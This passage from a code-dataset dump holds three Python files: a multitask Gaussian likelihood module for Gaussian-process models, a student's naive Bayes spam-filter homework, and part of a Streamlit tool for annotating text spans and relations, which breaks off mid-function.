| geoffder/learning | LP_deep_learning_2/LP_dropout_tensorflow.py | LP_dropout_tensorflow.py | py | 7,126 | python | en | code | 0 | github-code | 50 |
23445476397 | #!/usr/bin/env python3
import torch
from torch.nn.functional import softplus
from .. import settings
from ..functions import add_diag
from ..lazy import (
BlockDiagLazyTensor,
DiagLazyTensor,
KroneckerProductLazyTensor,
MatmulLazyTensor,
NonLazyTensor,
RootLazyTensor,
)
from ..likelihoods import Likelihood, _GaussianLikelihoodBase
from ..utils.deprecation import _deprecate_kwarg
from ..utils.transforms import _get_inv_param_transform
from .noise_models import MultitaskHomoskedasticNoise
class _MultitaskGaussianLikelihoodBase(_GaussianLikelihoodBase):
    """Base class for multi-task Gaussian Likelihoods, supporting general heteroskedastic noise models. """
    def __init__(self, num_tasks, noise_covar, rank=0, task_correlation_prior=None, batch_size=1):
        """
        Args:
            num_tasks (int):
                Number of tasks.
            noise_covar (:obj:`gpytorch.module.Module`):
                A model for the noise covariance. This can be a simple homoskedastic noise model, or a GP
                that is to be fitted on the observed measurement errors.
            rank (int):
                The rank of the task noise covariance matrix to fit. If `rank` is set to 0, then a diagonal covariance
                matrix is fit.
            task_correlation_prior (:obj:`gpytorch.priors.Prior`):
                Prior to use over the task noise correlation matrix. Only used when `rank` > 0.
            batch_size (int):
                Number of batches.
        """
        super().__init__(noise_covar=noise_covar)
        if rank != 0:
            # Low-rank-plus-diagonal parameterization of the inter-task noise
            # correlation: normalize(F F^T + diag(d)), with F of shape (batch, tasks, rank).
            self.register_parameter(
                name="task_noise_corr_factor", parameter=torch.nn.Parameter(torch.randn(batch_size, num_tasks, rank))
            )
            self.register_parameter(
                name="task_noise_corr_diag", parameter=torch.nn.Parameter(torch.ones(batch_size, num_tasks))
            )
            if task_correlation_prior is not None:
                # BUGFIX: the closure must *call* _eval_corr_matrix so the prior is
                # evaluated on the correlation matrix itself; the original lambda
                # returned the bound method object, not its result.
                self.register_prior(
                    "MultitaskErrorCorrelationPrior", task_correlation_prior, lambda: self._eval_corr_matrix()
                )
        elif task_correlation_prior is not None:
            raise ValueError("Can only specify task_correlation_prior if rank>0")
        self.num_tasks = num_tasks
        self.rank = rank
    def _eval_corr_matrix(self):
        """Assemble the (num_tasks x num_tasks) task noise correlation matrix
        from the low-rank factors, normalized to have unit diagonal."""
        corr_factor = self.task_noise_corr_factor.squeeze(0)
        corr_diag = self.task_noise_corr_diag.squeeze(0)
        M = corr_factor.matmul(corr_factor.transpose(-1, -2))
        idx = torch.arange(M.shape[-1], dtype=torch.long, device=M.device)
        M[..., idx, idx] += corr_diag
        # Divide by the outer product of the diagonal's square roots so the
        # result is a proper correlation matrix (unit diagonal).
        sem_inv = 1 / torch.diagonal(M, dim1=-2, dim2=-1).sqrt().unsqueeze(-1)
        return M * sem_inv.matmul(sem_inv.transpose(-1, -2))
    def forward(self, input, *params):
        """
        Adds the task noises to the diagonal of the covariance matrix of the supplied
        :obj:`gpytorch.distributions.MultivariateNormal` or :obj:`gpytorch.distributions.MultitaskMultivariateNormal`,
        in case of `rank` == 0. Otherwise, adds a rank `rank` covariance matrix to it.
        This scales the task correlations appropriately by the variances at the different points provided
        by the noise variance model (evaluated at the provided params).
        """
        mean, covar = input.mean, input.lazy_covariance_matrix
        batch_shape, n = covar.shape[:-2], covar.shape[-1] // self.num_tasks
        if len(batch_shape) > 1:
            raise NotImplementedError("Batch shapes with dim > 1 not yet supported for MulitTask Likelihoods")
        # compute the noise covariance
        if len(params) > 0:
            shape = None
        else:
            shape = mean.shape if len(mean.shape) == 1 else mean.shape[:-1]
        noise_covar = self.noise_covar(*params, shape=shape)
        if hasattr(self, "task_noise_corr_factor"):
            # if rank > 0, compute the task correlation matrix
            # TODO: This is inefficient, change repeat so it can repeat LazyTensors w/ multiple batch dimensions
            task_corr = self._eval_corr_matrix()
            exp_shape = batch_shape + torch.Size([n]) + task_corr.shape[-2:]
            if len(batch_shape) == 1:
                task_corr = task_corr.unsqueeze(-3)
            task_corr_exp = NonLazyTensor(task_corr.expand(exp_shape))
            noise_sem = noise_covar.sqrt()
            # Scale the correlation matrix by the pointwise noise standard errors:
            # D^{1/2} C D^{1/2} yields the per-point task noise covariance blocks.
            task_covar_blocks = MatmulLazyTensor(MatmulLazyTensor(noise_sem, task_corr_exp), noise_sem)
        else:
            # otherwise tasks are uncorrelated
            task_covar_blocks = noise_covar
        if len(batch_shape) == 1:
            # TODO: Properly support general batch shapes in BlockDiagLazyTensor (no shape arithmetic)
            tcb_eval = task_covar_blocks.evaluate()
            task_covar = BlockDiagLazyTensor(
                NonLazyTensor(tcb_eval.view(-1, *tcb_eval.shape[-2:])), num_blocks=tcb_eval.shape[0]
            )
        else:
            task_covar = BlockDiagLazyTensor(task_covar_blocks)
        return input.__class__(mean, covar + task_covar)
    def variational_log_probability(self, input, target):
        raise NotImplementedError("Variational inference with Multitask Gaussian likelihood is not yet supported")
class MultitaskGaussianLikelihood(_MultitaskGaussianLikelihoodBase):
    """
    A convenient extension of the :class:`gpytorch.likelihoods.GaussianLikelihood` to the multitask setting that allows
    for a full cross-task covariance structure for the noise. The fitted covariance matrix has rank `rank`.
    If a strictly diagonal task noise covariance matrix is desired, then rank=0 should be set. (This option still
    allows for a different `log_noise` parameter for each task.). This likelihood assumes homoskedastic noise.
    Like the Gaussian likelihood, this object can be used with exact inference.
    Note: This currently does not yet support batched training and evaluation. If you need support for this,
    use MultitaskGaussianLikelihoodKronecker for the time being.
    """
    def __init__(
        self,
        num_tasks,
        rank=0,
        task_correlation_prior=None,
        batch_size=1,
        noise_prior=None,
        param_transform=softplus,
        inv_param_transform=None,
        **kwargs
    ):
        """
        Args:
            num_tasks (int): Number of tasks.
            rank (int): The rank of the task noise covariance matrix to fit. If `rank` is set to 0,
                then a diagonal covariance matrix is fit.
            task_correlation_prior (:obj:`gpytorch.priors.Prior`): Prior to use over the task noise correlation matrix.
                Only used when `rank` > 0.
            batch_size (int): Number of batches.
            noise_prior (:obj:`gpytorch.priors.Prior`): Prior on the shared homoskedastic noise level.
            param_transform (callable): Maps the raw noise parameter to a positive value (default: softplus).
        """
        # Accept the deprecated `task_prior` keyword as an alias for task_correlation_prior.
        task_correlation_prior = _deprecate_kwarg(
            kwargs, "task_prior", "task_correlation_prior", task_correlation_prior
        )
        # Per-task homoskedastic noise model supplies the (diagonal) noise variances.
        noise_covar = MultitaskHomoskedasticNoise(
            num_tasks=num_tasks,
            noise_prior=noise_prior,
            batch_size=batch_size,
            param_transform=param_transform,
            inv_param_transform=inv_param_transform,
        )
        super().__init__(
            num_tasks=num_tasks,
            noise_covar=noise_covar,
            rank=rank,
            task_correlation_prior=task_correlation_prior,
            batch_size=batch_size,
        )
        self._param_transform = param_transform
        self._inv_param_transform = _get_inv_param_transform(param_transform, inv_param_transform)
        # Additional noise level shared across all tasks; added to the covariance diagonal in forward().
        self.register_parameter(name="raw_noise", parameter=torch.nn.Parameter(torch.zeros(batch_size, 1)))
    @property
    def noise(self):
        # Positive-valued noise obtained by transforming the raw parameter.
        return self._param_transform(self.raw_noise)
    @noise.setter
    def noise(self, value):
        self._set_noise(value)
    def _set_noise(self, value):
        # Accept plain numbers as well as tensors before applying the inverse transform.
        if not torch.is_tensor(value):
            value = torch.tensor(value)
        self.initialize(raw_noise=self._inv_param_transform(value))
    def forward(self, input, *params):
        """Add the task noise covariance (via the base class) plus the shared noise on the diagonal."""
        mvn = super().forward(input, *params)
        mean, covar = mvn.mean, mvn.lazy_covariance_matrix
        noise = self.noise
        if covar.ndimension() == 2:
            # Non-batched covariance: the noise parameter must be non-batched too.
            if settings.debug.on() and noise.size(0) > 1:
                raise RuntimeError("With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution.")
            noise = noise.squeeze(0)
        covar = add_diag(covar, noise)
        return input.__class__(mean, covar)
class MultitaskGaussianLikelihoodKronecker(_MultitaskGaussianLikelihoodBase):
    """
    A convenient extension of the :class:`gpytorch.likelihoods.GaussianLikelihood` to the multitask setting that allows
    for a full cross-task covariance structure for the noise. The fitted covariance matrix has rank `rank`.
    If a strictly diagonal task noise covariance matrix is desired, then rank=0 should be set. (This option still
    allows for a different `noise` parameter for each task.)
    Like the Gaussian likelihood, this object can be used with exact inference.
    Note: This Likelihood is scheduled to be deprecated and replaced by an improved version of
    `MultitaskGaussianLikelihood`. Use this only for compatibility with batched Multitask models.
    """
    def __init__(
        self,
        num_tasks,
        rank=0,
        task_prior=None,
        batch_size=1,
        noise_prior=None,
        param_transform=softplus,
        inv_param_transform=None,
        **kwargs
    ):
        """
        Args:
            num_tasks (int): Number of tasks.
            rank (int): The rank of the task noise covariance matrix to fit. If `rank` is set to 0,
                then a diagonal covariance matrix is fit.
            task_prior (:obj:`gpytorch.priors.Prior`): Prior to use over the task noise covariance matrix if
                `rank` > 0, or a prior over the log of just the diagonal elements, if `rank` == 0.
        """
        # Accept the deprecated `log_noise_prior` keyword as an alias for noise_prior.
        noise_prior = _deprecate_kwarg(kwargs, "log_noise_prior", "noise_prior", noise_prior)
        # Deliberately skip the _GaussianLikelihoodBase constructor (this class has no
        # noise_covar model); only the plain Module machinery is initialized here.
        super(Likelihood, self).__init__()
        self._param_transform = param_transform
        self._inv_param_transform = _get_inv_param_transform(param_transform, inv_param_transform)
        # Shared noise level (one per batch), kept positive through param_transform.
        self.register_parameter(name="raw_noise", parameter=torch.nn.Parameter(torch.zeros(batch_size, 1)))
        if rank == 0:
            # Diagonal task noise: one independent noise level per task.
            self.register_parameter(
                name="raw_task_noises", parameter=torch.nn.Parameter(torch.zeros(batch_size, num_tasks))
            )
            if task_prior is not None:
                raise RuntimeError("Cannot set a `task_prior` if rank=0")
        else:
            # Low-rank task noise covariance: F F^T + noise * I (see _eval_covar_matrix).
            self.register_parameter(
                name="task_noise_covar_factor", parameter=torch.nn.Parameter(torch.randn(batch_size, num_tasks, rank))
            )
            if task_prior is not None:
                self.register_prior("MultitaskErrorCovariancePrior", task_prior, self._eval_covar_matrix)
        self.num_tasks = num_tasks
        self.rank = rank
    @property
    def noise(self):
        """Positive noise level (param_transform applied to the raw parameter)."""
        return self._param_transform(self.raw_noise)
    @noise.setter
    def noise(self, value):
        self._set_noise(value)
    def _set_noise(self, value):
        # CONSISTENCY FIX: accept plain floats/ints as well as tensors, matching
        # MultitaskGaussianLikelihood._set_noise (the inverse transform expects a tensor).
        if not torch.is_tensor(value):
            value = torch.tensor(value)
        self.initialize(raw_noise=self._inv_param_transform(value))
    def _eval_covar_matrix(self):
        """Return the full task noise covariance: F F^T + noise * I."""
        covar_factor = self.task_noise_covar_factor
        noise = self.noise
        D = noise * torch.eye(self.num_tasks, dtype=noise.dtype, device=noise.device)
        return covar_factor.matmul(covar_factor.transpose(-1, -2)) + D
    def forward(self, input, *params):
        r"""
        Adds the task noises to the diagonal of the covariance matrix of the supplied
        :obj:`gpytorch.distributions.MultivariateNormal` or :obj:`gpytorch.distributions.MultitaskMultivariateNormal`,
        in case of `rank` == 0. Otherwise, adds a rank `rank` covariance matrix to it.
        To accomplish this, we form a new :obj:`gpytorch.lazy.KroneckerProductLazyTensor` between :math:`I_{n}`,
        an identity matrix with size equal to the data and a (not necessarily diagonal) matrix containing the task
        noises :math:`D_{t}`.
        We also incorporate a shared `noise` parameter from the base
        :class:`gpytorch.likelihoods.GaussianLikelihood` that we extend.
        The final covariance matrix after this method is then :math:`K + D_{t} \otimes I_{n} + \sigma^{2}I_{nt}`.
        (Docstring is a raw string so the :math:`\otimes`/:math:`\sigma` backslashes
        are not treated as invalid escape sequences.)
        Args:
            input (:obj:`gpytorch.distributions.MultitaskMultivariateNormal`): Random variable whose covariance
                matrix is a :obj:`gpytorch.lazy.LazyTensor` we intend to augment.
        Returns:
            :obj:`gpytorch.distributions.MultitaskMultivariateNormal`: A new random variable whose covariance
            matrix is a :obj:`gpytorch.lazy.LazyTensor` with :math:`D_{t} \otimes I_{n}` and :math:`\sigma^{2}I_{nt}`
            added.
        """
        mean, covar = input.mean, input.lazy_covariance_matrix
        if self.rank == 0:
            # Diagonal task covariance from the per-task noise parameters.
            task_noises = self._param_transform(self.raw_task_noises)
            if covar.ndimension() == 2:
                if settings.debug.on() and task_noises.size(0) > 1:
                    raise RuntimeError(
                        "With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution."
                    )
                task_noises = task_noises.squeeze(0)
            task_var_lt = DiagLazyTensor(task_noises)
            dtype, device = task_noises.dtype, task_noises.device
        else:
            # Low-rank task covariance F F^T, represented lazily via its root F.
            task_noise_covar_factor = self.task_noise_covar_factor
            if covar.ndimension() == 2:
                if settings.debug.on() and task_noise_covar_factor.size(0) > 1:
                    raise RuntimeError(
                        "With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution."
                    )
                task_noise_covar_factor = task_noise_covar_factor.squeeze(0)
            task_var_lt = RootLazyTensor(task_noise_covar_factor)
            dtype, device = task_noise_covar_factor.dtype, task_noise_covar_factor.device
        if covar.ndimension() == 2:
            eye_lt = DiagLazyTensor(torch.ones(covar.size(-1) // self.num_tasks, dtype=dtype, device=device))
        else:
            eye_lt = DiagLazyTensor(
                torch.ones(covar.size(0), covar.size(-1) // self.num_tasks, dtype=dtype, device=device)
            )
        # Make sure the batch sizes are going to match
        if task_var_lt.size(0) == 1:
            task_var_lt = task_var_lt.repeat(eye_lt.size(0), 1, 1)
        covar_kron_lt = KroneckerProductLazyTensor(eye_lt, task_var_lt)
        covar = covar + covar_kron_lt
        noise = self.noise
        if covar.ndimension() == 2:
            if settings.debug.on() and noise.size(0) > 1:
                raise RuntimeError("With batch_size > 1, expected a batched MultitaskMultivariateNormal distribution.")
            noise = noise.squeeze(0)
        covar = add_diag(covar, noise)
        return input.__class__(mean, covar)
| KhurramPirov/Log-Determinants-Estimator | demo/FLOVE/likelihoods/multitask_gaussian_likelihood.py | multitask_gaussian_likelihood.py | py | 15,064 | python | en | code | 0 | github-code | 50 |
28887970366 | ############################################################
# CMPSC442: Homework 5
############################################################
student_name = "John_Hofbauer"
############################################################
# Imports
# What modules can I import? -- collections, itertools, math, random, queue, email, os, re, string, copy, os
############################################################
# Include your imports here, if any are used.
import os
from email import message_from_file, iterators
from math import log, exp
from collections import Counter, OrderedDict
############################################################
# Section 1: Spam Filter
############################################################
def load_tokens(email_path):
    """Tokenize the body of the email file at `email_path`.

    Parses the file as an RFC 2822 message and returns every
    whitespace-separated token from the body lines (headers are excluded
    by email.iterators.body_line_iterator).
    """
    # `with` guarantees the handle is closed even if parsing raises;
    # the previous manual close leaked the file descriptor on error.
    with open(email_path, "r", encoding="utf-8") as file:
        message = message_from_file(file)
        return [token for lines in iterators.body_line_iterator(message) for token in lines.split()]
def log_probs(email_paths, smoothing):
    """Compute additively-smoothed log-probabilities for every token in the emails.

    Uses Lidstone smoothing: log((count + s) / (total + s * (V + 1))), where V is
    the number of distinct tokens; the extra +1 reserves mass for the "<UNK>"
    entry used for unseen tokens. Values are kept in log space so downstream
    products of probabilities become sums (avoids floating-point underflow).
    """
    counts = Counter()
    for path in email_paths:
        counts.update(load_tokens(path))
    total_tokens = sum(counts.values())
    vocabulary_size = len(counts) + 1  # +1 for the "<UNK>" pseudo-token
    denominator = total_tokens + (smoothing * vocabulary_size)
    probabilities = {word: log((count + smoothing) / denominator)
                     for word, count in counts.items()}
    probabilities["<UNK>"] = log(smoothing / denominator)
    return probabilities
class SpamFilter(object):
    """Naive Bayes spam classifier trained on directories of spam and ham emails.

    Per-token log-probabilities come from `log_probs`; classification sums the
    log-probabilities (a log-space product) and compares the spam total against
    the ham total, each weighted by its class prior.
    """
    def __init__(self, spam_dir, ham_dir, smoothing):
        # List every training file in each directory (kept as two separate
        # comprehensions; the original author noted a runtime effect).
        spamFiles = [(spam_dir+'/'+i) for i in os.listdir(spam_dir)]
        hamFiles = [(ham_dir+'/'+i) for i in os.listdir(ham_dir)]
        spamFileAmount = len(spamFiles)
        hamFileAmount = len(hamFiles)
        # Smoothed per-token log-probability tables for each class.
        self.Pspam = log_probs(spamFiles, smoothing)
        self.Pham = log_probs(hamFiles, smoothing)
        # Class priors P(spam) and P(ham), estimated from the file counts.
        # (Despite the names, these hold plain probabilities, not logs.)
        self.spamLogProbability = spamFileAmount / (spamFileAmount + hamFileAmount)
        self.hamLogProbability = hamFileAmount / (spamFileAmount + hamFileAmount)
    def is_spam(self, email_path):
        """Return True when the email at `email_path` is more likely spam than ham."""
        # Count each token in the email body.
        tokenCount = Counter([token for token in load_tokens(email_path)])
        # Sum per-token log-probabilities (log-space product); tokens missing
        # from a table fall back to its "<UNK>" entry.
        spamProduct = sum([self.Pspam[token] if token in self.Pspam else self.Pspam["<UNK>"] for token, count in tokenCount.items()])
        hamProduct = sum([self.Pham[token] if token in self.Pham else self.Pham["<UNK>"] for token, count in tokenCount.items()])
        # Compare log P(spam) + sum log P(token|spam) with the ham equivalent.
        return log(self.spamLogProbability)+spamProduct > log(self.hamLogProbability)+hamProduct
    def most_indicative_spam(self, n):
        """Return the n tokens whose presence most strongly indicates spam."""
        # score(w) = log P(w|ham) - log(P(w|spam) + P(w|ham)); the smallest
        # scores belong to tokens rare in ham relative to spam. Only tokens
        # present in both tables are scored.
        tokenProbabilitys = {token:count-log((exp(self.Pham[token])+exp(self.Pspam[token]))) for token, count in self.Pham.items() if (token in self.Pspam)}
        #print('table 1', [i for i in tokenProbabilitys.items()][:10])
        # Sort tokens by score ascending and keep the first n.
        return [token[0] for token in sorted(tokenProbabilitys.items(), key=lambda x: x[1])][:n]
    def most_indicative_ham(self, n):
        """Return the n tokens whose presence most strongly indicates ham."""
        # Mirror image of most_indicative_spam: score from the spam table.
        tokenProbabilitys = {token:count-log((exp(self.Pspam[token])+exp(self.Pham[token]))) for token, count in self.Pspam.items() if (token in self.Pham)}
        # Sort tokens by score ascending and keep the first n.
        return [token[0] for token in sorted(tokenProbabilitys.items(), key=lambda x: x[1])][:n]
############################################################
# Test Code
############################################################
"""
import time
startTime = time.time()
# 1
ham_dir="homework5_data/train/ham/"
print(load_tokens(ham_dir+"ham1")[200:204])
print(load_tokens(ham_dir+"ham2")[110:114])
spam_dir="homework5_data/train/spam/"
print(load_tokens(spam_dir+"spam1")[1:5])
print(load_tokens(spam_dir+"spam2")[:4])
# 2
paths=["homework5_data/train/ham/ham%d"%i for i in range(1,11)]
p=log_probs(paths,1e-5)
print(p["the"])
print(p["line"])
paths=["homework5_data/train/spam/spam%d"%i for i in range(1,11)]
p=log_probs(paths,1e-5)
print(p["Credit"])
print(p["<UNK>"])
# 3
# 4
sf=SpamFilter("homework5_data/train/spam","homework5_data/train/ham",1e-5)
print(sf.is_spam("homework5_data/train/spam/spam1"))
print(sf.is_spam("homework5_data/train/spam/spam2" ))
sf = SpamFilter("homework5_data/train/spam", "homework5_data/train/ham", 1e-5)
print(sf.is_spam("homework5_data/train/ham/ham1"))
print(sf.is_spam("homework5_data/train/ham/ham2"))
# 5
sf=SpamFilter("homework5_data/train/spam", "homework5_data/train/ham",1e-5)
print(sf.most_indicative_spam(5))
sf=SpamFilter("homework5_data/train/spam", "homework5_data/train/ham",1e-5)
print(sf.most_indicative_ham(5))
print(time.time() - startTime)
"""
############################################################
# Section 2: Feedback
############################################################
feedback_question_1 = """
20 Hours - coding the assinment was eaiser that understanding why the
result was what it should be.
"""
feedback_question_2 = """
Understanding the effects of smothing. (I know we went through it in class
but actualy using it, is diffrent.)
"""
feedback_question_3 = """
Ehh, it was better than the last assigment.
I would have started with this assignment, since the order of the hw assignment
has no real connection in my opinion.
"""
| JohnHofbauer/Artificial-Intelligence | Assignment 5/homework5_jch5769.py | homework5_jch5769.py | py | 6,509 | python | en | code | 0 | github-code | 50 |
10759963601 | import generic
import streamlit as st
import spacy_streamlit
from itertools import combinations
import json
import sys
def show_layout(type='page', data=None, layout=None):
    """Render a row of Streamlit buttons, one per column.

    Args:
        type: 'page' renders the fixed 'Prev Page'/'Next Page' pager;
            any other value renders one button per entry of `data`.
        data: button labels, one per column (ignored when type='page';
            when falsy, no buttons are rendered).
        layout: column-width spec passed to st.columns (defaults to [.1, .6]).

    Returns:
        list of the buttons' clicked states (empty if no buttons rendered).
    """
    if layout is None:
        # Sentinel instead of a mutable default argument.
        layout = [.1, .6]
    cols = st.columns(layout)
    returns = []
    if type == 'page':
        data = ['Prev Page', 'Next Page']
    for col_idx, col in enumerate(cols):
        with col:
            if data:
                # Button keys are derived from the labels (lowercase, underscores).
                returns.append(st.button(data[col_idx], key=data[col_idx].lower().replace(' ', '_')))
    return returns
def save_data(update_status, iter_obj, path=None):
    """Persist the annotated JSONL lines (download button on linux, file write elsewhere).

    Args:
        update_status: truthy when the current page's relations were changed.
        iter_obj: list of JSON strings, one per annotated text.
        path: the uploaded file object (has a `.name` attribute) or None.
    """
    if update_status or path:
        # Derive the output filename from the uploaded file's name.
        if not path:
            filename = 'sample2.jsonl'
        elif path.name.find('json') != -1:
            # BUGFIX: find() returns -1 (truthy) when absent, so the original
            # `if path.name.find('json'):` kept non-json names unchanged.
            filename = path.name
        else:
            filename = f"{path.name[:path.name.rfind('.')]}.jsonl"
        if sys.platform != 'linux':
            # NOTE(review): the original literal here was corrupted ('(unknown)');
            # writing into the assets/ folder appears to be the intent — confirm.
            filename = f'assets/{filename}'
        if sys.platform == 'linux':
            json_str = '\n'.join(iter_obj)
            # TODO(review): file_name=path passes the upload object itself;
            # `filename` looks like the intended value — confirm before changing.
            st.download_button('Download', key='save', data=json_str, file_name=path)
        else:
            overwrite, save_copy = show_layout(type='save', data=['Overwrite', 'Save as'])
            if overwrite or save_copy:
                if save_copy and path:
                    filename = f"{path.name[:path.name.rfind('.')]}_out.jsonl"
                with open(filename, "w", encoding="utf-8") as jsonfile:
                    for entry in iter_obj:
                        jsonfile.write(entry)
                        jsonfile.write('\n')
def process_spans(rel_dict, spans, spans_pos, relations, prev_rel):
    """Render the span-pair selector and the relation summary for the chosen pair.

    Args:
        rel_dict: category -> action -> polarity options for relation labels.
        spans: span dicts of the current text.
        spans_pos: span text -> list of token-start positions.
        relations: current relation dicts (unused here; kept for interface stability).
        prev_rel: previously stored relation dicts, indexed like session relations.

    Returns:
        True once a relation label has been chosen for the selected pair,
        otherwise None.
    """
    st.subheader('Select span elements!')
    # Duplicate span texts are disambiguated with a " (k)" suffix.
    sel_spans = st.multiselect(
        'Entities',
        key='multi_spans',
        options=[f'{text} ({idx+1})' if len(tokens_start) > 1 else text
                 for text, tokens_start in spans_pos.items()
                 for idx in range(len(tokens_start))],
        on_change=generic.update_session,
        kwargs={'session_key': 'radio_spans', 'value': None},
    )
    if len(sel_spans) >= 2:
        _, _, texts_list, rel_idx, rel_str = display_sidebar(rel_dict=rel_dict, spans=sel_spans, spans_pos=spans_pos)
        if rel_idx is not None:  # idiom fix: was `!= None`
            show_summary(texts_list, rel_str, prev_rel[rel_idx])
            if len(rel_str) > 0:
                return True
    return None
def process_edit(edit_spans,text):
    """Handle the sidebar 'Modify spans' workflow for the current text.

    Args:
        edit_spans: one of None, 'Reset', 'Modify', 'Remove' (sidebar selection).
        text: the current annotation record (dict with 'tokens', 'spans', 'relations').

    Returns:
        (spans_sets, rerun): the edited span dicts (empty list when nothing was
        edited) and a flag asking the caller to trigger st.experimental_rerun().
    """
    rerun = False
    spans_sets = []
    if edit_spans:
        st.subheader('Modify span entities!')
        # Flatten the token records into the shape generic.process_multisel_span expects.
        tokens_sets = [{'text':tokens['text'],'start':tokens['start'],'token_start':tokens['id'],'ws':tokens['ws']} for tokens in text['tokens']]
        # spans_sets = []
        iter_idx = 0
        st.session_state.tokens_sets, st.session_state.span_iter_idx = tokens_sets, iter_idx
        if edit_spans == 'Reset': # Resetting previous spans and relations
            # Repeatedly ask for start/end token pairs until the user stops selecting.
            while tokens_sets and iter_idx >= 0:
                span_start = st.selectbox(f'Starting token (Index: {iter_idx})',key=f'span_start_{iter_idx}',options=[None]+list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets)))
                if span_start:
                    # Only tokens at or after the chosen start are valid span ends.
                    tokens_list = [token for token in tokens_sets if token['token_start']>=int(span_start[:span_start.find(':')])]
                    span_end = st.selectbox(f'Ending token (Index: {iter_idx})',key=f'span_end_{iter_idx}',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_list),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
                    span_multisel = [span_start,span_end]
                    text, spans_sets, tokens_sets, iter_idx = generic.process_multisel_span(span_multisel=span_multisel,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
                else:
                    break
            # span_multisels = st.multiselect(f'Span (Index: {iter_idx})',key=f'span_{iter_idx}',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets))#,on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
            # text, spans_sets, tokens_sets, iter_idx = generic.process_multisel_span(span_multisel=span_multisels,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
            if len(spans_sets)>1:
                # Persist the freshly built spans and rebuild the pairwise relations.
                update_data = st.sidebar.button('Update session')
                if update_data:
                    generic.update_session(session_key='spans',value=spans_sets)
                    generic.make_relations(spans=spans_sets,type=edit_spans)
                    text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
        elif edit_spans == 'Modify': # Only changing selected span
            span_sel = st.selectbox(f'Span to modify',key='select_span',options=[None]+list(map(lambda x:f"{text['spans'].index(x)}: {x['text']}",text['spans'])))
            if span_sel:
                # Selected option is "<index>: <text>"; parse the span index back out.
                iter_idx = int(span_sel[:span_sel.find(':')])
                spans_sets, tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets,type=edit_spans)
                prev_span_range = [spans_sets[iter_idx]['token_start'],spans_sets[iter_idx]['token_end']-1]
                # tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets)
                # span_multisel = st.multiselect('Span',key='multi_span',options=map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
                span_start = st.selectbox(f'Starting token',key='span_start',options=[None]+list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_sets)))
                if span_start:
                    tokens_list = [token for token in tokens_sets if token['token_start']>=int(span_start[:span_start.find(':')])]
                    span_end = st.selectbox(f'Ending token',key='span_end',options=list(map(lambda x:f"{x['token_start']}: {x['text']}",tokens_list)),on_change=generic.process_multisel_span,kwargs={'text':text,'spans_sets':spans_sets,'tokens_sets':tokens_sets,'type':edit_spans,'iter_idx':iter_idx})
                    span_multisel = [span_start,span_end]
                    span_range = list(map(lambda x:int(x[:x.find(':')]),span_multisel))
                    text, spans_sets, tokens_sets, iters = generic.process_multisel_span(span_multisel=span_multisel,text=text,spans_sets=spans_sets,tokens_sets=tokens_sets,type=edit_spans,iter_idx=iter_idx)
                    if prev_span_range != span_range:
                        # The span boundaries changed: update this span and its relations only.
                        generic.update_session(session_key='spans',key=iter_idx,value=spans_sets[iter_idx])
                        generic.make_relations(spans=spans_sets[iter_idx],iter_idx=iters,type=edit_spans)
                        text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
        elif edit_spans == 'Remove': # Remove selected span
            span_sel = st.selectbox(f'Span to remove',key='remove_span',options=[None]+list(map(lambda x:f"{text['spans'].index(x)}: {x['text']}",text['spans'])))
            if span_sel:
                iter_idx = int(span_sel[:span_sel.find(':')])
                spans_sets, tokens_sets = generic.process_sel_span(span_sel=span_sel,text=text,tokens_sets=tokens_sets,type=edit_spans)
                if len(text['spans']) != len(spans_sets):
                    # A span was actually dropped: persist and ask the caller to rerun.
                    generic.update_session(session_key='spans',value=spans_sets)
                    generic.make_relations(spans=spans_sets,type=edit_spans)
                    text['spans'], text['relations'] = st.session_state.spans, st.session_state.relations
                    rerun = True
    return spans_sets, rerun
    # return st.session_state.spans, st.session_state.relations
def show_summary(texts_list, new_rel, prev_rel):
    """Show the selected entity pair, its previous relation label, and —
    only when it changed — the newly chosen label."""
    st.subheader('Entity Relations Set')
    entity_a, entity_b = texts_list[1], texts_list[2]
    st.markdown(f'Related elements: `{entity_a}` - `{entity_b}`')
    st.markdown(f"Previous Relations: `{prev_rel['label']}`")
    if new_rel != prev_rel:
        st.markdown(f"New Relations: `{new_rel['label']}`")
def show_table(spans_pos):
    """Render a markdown table listing every relation stored in session state.

    Each row shows the head/child entity texts (resolved through
    generic.get_obj_value) and the relation's current label.
    """
    header = "Entities | Previous Relations \n---|---\n"
    rows = [
        f"***{generic.get_obj_value(spans_pos, spans['head'], access='value')}*** - "
        f"***{generic.get_obj_value(spans_pos, spans['child'], access='value')}*** | `{spans['label']}`"
        for spans in st.session_state.relations
    ]
    st.subheader('Entity Relations for the Entire Set')
    st.markdown(header + '\n'.join(rows))
    st.markdown('\n')
def display_sidebar(rel_dict,spans=None,spans_pos=None):
    """Render the sidebar for the current workflow stage.

    With neither spans nor spans_pos: show the file uploader and return the
    upload plus its parsed JSON lines. With spans selected: show the
    pair/category/action/polarity selectors and write the chosen relation
    label into session state.

    Returns:
        (upload, json_lines, texts_list, rel_idx, relation_dict) — unused
        slots are None (the last slot defaults to an empty dict).
    """
    with st.sidebar:
        if not spans and not spans_pos:
            st.subheader('Select a file to upload')
            upload = st.file_uploader('Upload',type=['txt','jsonl'],key='upload')
            json_lines = generic.read_text(upload)
            return upload, json_lines, None, None, {}
        elif not spans:
            st.subheader('Select entities to analyze')
        else:
